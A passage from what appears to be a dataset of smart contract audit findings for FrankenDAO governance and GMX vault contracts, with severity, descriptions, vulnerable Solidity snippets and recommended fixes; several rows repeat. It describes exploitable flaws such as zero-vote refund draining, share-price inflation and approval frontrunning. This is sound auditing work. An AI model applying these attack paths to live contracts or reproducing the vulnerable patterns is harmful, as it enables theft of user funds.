won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.",Governance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\n,Vault can be drained maliciously by users with no votes,"```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n" +Delegate can keep can keep delegatee trapped indefinitely,medium,"Users are allowed to delegate their votes to other users. Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delgatee cannot unstake or delegate. A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single users can only have a one proposal opened at the same time so they would use a secondary account to alternate and always keep an active proposal.","There should be a function to emergency eject the token from staking. To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.",Delegatees can never unstake or delegate to anyone else,"```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n" +"If a user approves junior vault tokens to WithdrawPeriphery, anyone can withdraw/redeem his/her token",high,"If users want to withdraw/redeem tokens by WithdrawPeriphery, they should approve token approval to WithdrawPeriphery, then call `withdrawToken()` or `redeemToken()`. But if users approve `dnGmxJuniorVault` to WithdrawPeriphery, anyone can withdraw/redeem his/her token.\\nUsers should approve `dnGmxJuniorVault` before calling `withdrawToken()` or redeemToken():\\n```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n\\nFor better user experience, we always use `approve(WithdrawPeriphery, type(uint256).max)`. It means that if Alice approves the max amount, anyone can withdraw/redeem her tokens anytime. Another scenario is that if Alice approves 30 amounts, she wants to call `withdrawToken` to withdraw 30 tokens. But in this case Alice should send two transactions separately, then an attacker can frontrun `withdrawToken` transaction and withdraw Alice's token.","Replace `from` parameter by `msg.sender`.\\n```\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), msg.sender);\\n\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), msg.sender);\\n```\\n","Attackers can frontrun withdraw/redeem transactions and steal tokens. And some UI always approves max amount, which means that anyone can withdraw users tokens.","```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n" +DnGmxJuniorVaultManager#harvestFees can push junior vault borrowedUSDC above borrow cap and DOS vault,medium,"DnGmxJuniorVaultManager#harvestFees grants fees to the senior vault by converting the WETH to USDC and staking it directly. The result is that the senior vault gains value indirectly by increasing the debt of the junior vault. If the junior vault is already at it's borrow cap this will push it's total borrow over the borrow cap causing DnGmxSeniorVault#availableBorrow to underflow and revert. This is called each time a user deposits or withdraws from the junior vault meaning that the junior vault can no longer deposit or withdraw.\\n```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n\\nThe above lines converts the WETH owed to the senior vault to USDC and deposits it into Aave. Increasing the aUSDC balance of the junior vault.\\n```\\nfunction getUsdcBorrowed() public view returns (uint256 usdcAmount) {\\n return\\n uint256(\\n state.aUsdc.balanceOf(address(this)).toInt256() -\\n state.dnUsdcDeposited -\\n state.unhedgedGlpInUsdc.toInt256()\\n );\\n}\\n```\\n\\nThe amount of USDC borrowed is calculated based on the amount of aUSDC that the junior vault has. By depositing the fees directly above, the junior vault has effectively ""borrowed"" more USDC. This can be problematic if the junior vault is already at it's borrow cap.\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? availableBasisCap : availableBasisBalance;\\n}\\n```\\n\\nIf the vault is already at it's borrow cap then the line calculating `availableBasisCap` will underflow and revert.",Check if borrowed exceeds borrow cap and return zero to avoid underflow:\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n\\n+ uint256 borrowCap = borrowCaps[borrower];\\n+ uint256 borrowed = IBorrower(borrower).getUsdcBorrowed();\\n\\n+ if (borrowed > borrowCap) return 0;\\n\\n+ uint256 availableBasisCap = borrowCap - borrowed;\\n\\n- uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? availableBasisCap : availableBasisBalance;\\n}\\n```\\n,availableBorrow will revert causing deposits/withdraws to revert,"```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n" +WithdrawPeriphery#_convertToToken slippage control is broken for any token other than USDC,medium,"WithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX, applying a fixed slippage threshold to all redeems. The slippage calculation always returns the number of tokens to 6 decimals. This works fine for USDC but for other tokens like WETH or WBTC that are 18 decimals the slippage protection is completely ineffective and can lead to loss of funds for users that are withdrawing.\\n```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n\\nWithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX. To prevent users from losing large amounts of value to MEV the contract applies a fixed percentage slippage. minToken out is returned to 6 decimals regardless of the token being requested. This works for tokens with 6 decimals like USDC, but is completely ineffective for the majority of tokens that aren't.","Adjust minTokenOut to match the decimals of the token:\\n```\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n+ minTokenOut = minTokenOut * 10 ** (token.decimals() - 6);\\n```\\n",Users withdrawing tokens other than USDC can suffer huge loss of funds due to virtually no slippage protection,"```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n" +WithdrawPeriphery uses incorrect value for MAX_BPS which will allow much higher slippage than intended,medium,"WithdrawPeriphery accidentally uses an incorrect value for MAX_BPS which will allow for much higher slippage than intended.\\n```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n\\nBPS is typically 10,000 and using 1000 is inconsistent with the rest of the ecosystem contracts and tests. The result is that slippage values will be 10x higher than intended.",Correct MAX_BPS:\\n```\\n- uint256 internal constant MAX_BPS = 1000;\\n+ uint256 internal constant MAX_BPS = 10_000;\\n```\\n,"Unexpected slippage resulting in loss of user funds, likely due to MEV",```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n +Early depositors to DnGmxSeniorVault can manipulate exchange rates to steal funds from later depositors,medium,"To calculate the exchange rate for shares in DnGmxSeniorVault it divides the total supply of shares by the totalAssets of the vault. The first deposit can mint a very small number of shares then donate aUSDC to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalAsset. This can lead to exchange rate manipulation. As an example, an adversary can mint a single share, then donate 1e8 aUSDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. Now any deposit lower than 1e8 (100 aUSDC) will suffer from precision loss and the attackers share will benefit from it.\\nThis same vector is present in DnGmxJuniorVault.","Initialize should include a small deposit, such as 1e6 aUSDC that mints the share to a dead address to permanently lock the exchange rate:\\n```\\n aUsdc.approve(address(pool), type(uint256).max);\\n IERC20(asset).approve(address(pool), type(uint256).max);\\n\\n+ deposit(1e6, DEAD_ADDRESS);\\n```\\n",Adversary can effectively steal funds from later users,"```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n" +The total community voting power is updated incorrectly when a user delegates.,high,"When a user delegates their voting power from staked tokens, the total community voting power should be updated. But the update logic is not correct, the the total community voting power could be wrong values.\\n```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n\\nWhen the total community voting power is increased in the first if statement, _delegator's token voting power might be positive already and community voting power might be added to total community voting power before.\\nAlso, currentDelegate's token voting power might be still positive after delegation so we shouldn't remove the communitiy voting power this time.","Add more conditions to check if the msg.sender delegated or not.\\n```\\n if (_delegator == _delegatee) {\\n if(tokenVotingPower[_delegatee] == amount) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n }\\n if(tokenVotingPower[currentDelegate] == 0) {\\n _updateTotalCommunityVotingPower(currentDelegate, false); \\n }\\n } else if (currentDelegate == _delegator) {\\n if(tokenVotingPower[_delegatee] == amount) {\\n _updateTotalCommunityVotingPower(_delegatee, true);\\n }\\n if(tokenVotingPower[_delegator] == 0) {\\n _updateTotalCommunityVotingPower(_delegator, false); \\n }\\n }\\n```\\n",The total community voting power can be incorrect.,"```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n" +Staking#changeStakeTime and changeStakeAmount are problematic given current staking design,medium,"Staking#changeStakeTime and changeStakeAmount allow the locking bonus to be modified. Any change to this value will cause voting imbalance in the system. If changes result in a higher total bonus then existing stakers will be given a permanent advantage over new stakers. If the bonus is increased then existing stakers will be at a disadvantage because they will be locked and unable to realize the new staking bonus.\\n```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n\\nWhen a token is staked their stakeTimeBonus is stored. This means that any changes to stakingSettings.maxStakeBonusAmount or stakingSettings.maxStakeBonusTime won't affect tokens that are already stored. Storing the value is essential to prevent changes to the values causing major damage to the voting, but it leads to other more subtle issue when it is changed that will put either existing or new stakers at a disadvantage.\\nExample: User A stake when maxStakeBonusAmount = 10 and stake long enough to get the entire bonus. Now maxStakeBonusAmount is changed to 20. User A is unable to unstake their token right away because it is locked. They are now at a disadvantage because other users can now stake and get a bonus of 20 while they are stuck with only a bonus of 10. Now maxStakeBonusAmount is changed to 5. User A now has an advantage because other users can now only stake for a bonus of 5. If User A never unstakes then they will forever have that advantage over new users.","I recommend implementing a poke function that can be called by any user on any user. This function should loop through all tokens (or the tokens specified) and recalculate their voting power based on current multipliers, allowing all users to be normalized to prevent any abuse.",Voting power becomes skewed for users when Staking#changeStakeTime and changeStakeAmount are used,"```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n" +Adversary can abuse delegating to lower quorum,medium,"When a user delegates to another user they surrender their community voting power. The quorum threshold for a vote is determined when it is created. Users can artificially lower quorum by delegating to other users then creating a proposal. After it's created they can self delegate and regain all their community voting power to reach quorum easier.\\n```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n\\nWhen a user delegates to user other than themselves, they forfeit their community votes and lowers the total number of votes. When they self delegate again they will recover all their community voting power.\\n```\\n newProposal.id = newProposalId.toUint96();\\n newProposal.proposer = msg.sender;\\n newProposal.targets = _targets;\\n newProposal.values = _values;\\n newProposal.signatures = _signatures;\\n newProposal.calldatas = _calldatas;\\n\\n //@audit quorum votes locked at creation\\n\\n newProposal.quorumVotes = quorumVotes().toUint24();\\n newProposal.startTime = (block.timestamp + votingDelay).toUint32();\\n newProposal.endTime = (block.timestamp + votingDelay + votingPeriod).toUint32();\\n```\\n\\nWhen a proposal is created the quorum is locked at the time at which it's created. Users can combine these two quirks to abuse the voting.\\nExample:\\nAssume there is 1000 total votes and quorum is 20%. Assume 5 users each have 35 votes, 10 base votes and 25 community votes. In this scenario quorum is 200 votes which they can't achieve. Each user delegates to other users, reducing each of their votes by 25 and reducing the total number of votes of 875. Now they can create a proposal and quorum will now be 175 votes (875*20%). They all self delegate and recover their community votes. Now they can reach quorum and pass their proposal.","One solution would be to add a vote cooldown to users after they delegate, long enough to make sure all active proposals have expired before they're able to vote. The other option would be to implement checkpoints.",Users can collude to lower quorum and pass proposal easier,"```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n" +castVote can be called by anyone even those without votes,medium,"Governance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.",Governance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\n,Vault can be drained maliciously by users with no votes,"```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n" +[Tomo-M3] Use safeMint instead of mint for ERC721,medium,"Use safeMint instead of mint for ERC721\\nThe `msg.sender` will be minted as a proof of staking NFT when `_stakeToken()` is called.\\nHowever, if `msg.sender` is a contract address that does not support ERC721, the NFT can be frozen in the contract.\\nAs per the documentation of EIP-721:\\nA wallet/broker/auction application MUST implement the wallet interface if it will accept safe transfers.\\nAs per the documentation of ERC721.sol by Openzeppelin\\n```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal virtual {\\n```\\n",Use `safeMint` instead of `mint` to check received address support for ERC721 implementation.,Users possibly lose their NFTs,"```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal virtual {\\n```\\n" +[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`,medium,"[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`\\nFrankenDAO allows users to stake two types of NFTs, `Frankenpunks` and `Frankenmonsters` , one of which is considered more valuable, ie: `Frankenpunks`,\\nThis is achieved by reducing votes applicable for `Frankenmonsters` by `monsterMultiplier`.\\n```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nThis `monsterMultiplier` is initially set as 50 and could be changed by governance proposal.\\n```\\nfunction setMonsterMultiplier(uint _monsterMultiplier) external onlyExecutor {\\n emit MonsterMultiplierChanged(monsterMultiplier = _monsterMultiplier); \\n }\\n```\\n\\nHowever, one piece of code inside the FrakenDAO staking contract doesn't consider this and has a monster multiplier hardcoded.\\n```\\nfunction stake(uint[] calldata _tokenIds, uint _unlockTime) \\n----\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n --------\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? **fullStakedTimeBonus : fullStakedTimeBonus / 2;** \\n }\\n--------\\n```\\n\\nHence any update done to `monsterMultiplier` would not reflect in the calculation of `stakedTimeBonus`, and thereby votes.",Consider replacing the hardcoded value with monsterMultiplier,"Any update done to monsterMultiplier would not be reflected in stakedTimeBonus; it would always remain as /2 or 50%.\\nLikelihood: Medium\\nOne needs to pass a governance proposal to change the monster multiplier, so this is definitely not a high likelihood; it's not low as well, as there is a clear provision in spec regarding this.","```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n" +`getCommunityVotingPower` doesn't calculate voting Power correctly due to precision loss,medium,"In `Staking.sol`, the getCommunityVotingPower function, doesn't calculate the votes correctly due to precision loss.\\nIn getCommunityVotingPower function, the `return` statement is where the mistake lies in:\\n```\\n return \\n (votes * cpMultipliers.votes / PERCENT) + \\n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \\n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\\n```\\n\\nHere, after each multiplication by the `Multipliers`, we immediately divide it by `PERCENT`. Every time we do a division, there is a certain amount of precision loss. And when its done thrice, the loss just accumulates. So instead, the division by `PERCENT` should be done after all 3 terms are added together.\\nNote that this loss is not there, if the `Multipliers` are a multiple of `PERCENT`. But these values can be changed through governance later. So its better to be careful assuming that they may not always be a multiple of `PERCENT`.",Do the division once after all terms are added together:\\n```\\n return \\n ( (votes * cpMultipliers.votes) + \\n (proposalsCreated * cpMultipliers.proposalsCreated) + \\n (proposalsPassed * cpMultipliers.proposalsPassed) ) / PERCENT;\\n }\\n```\\n,The community voting power of the user is calculated wrongly.,```\\n return \\n (votes * cpMultipliers.votes / PERCENT) + \\n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \\n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\\n```\\n +Delegate can keep can keep delegatee trapped indefinitely,medium,"Users are allowed to delegate their votes to other users. Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delgatee cannot unstake or delegate. A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single users can only have a one proposal opened 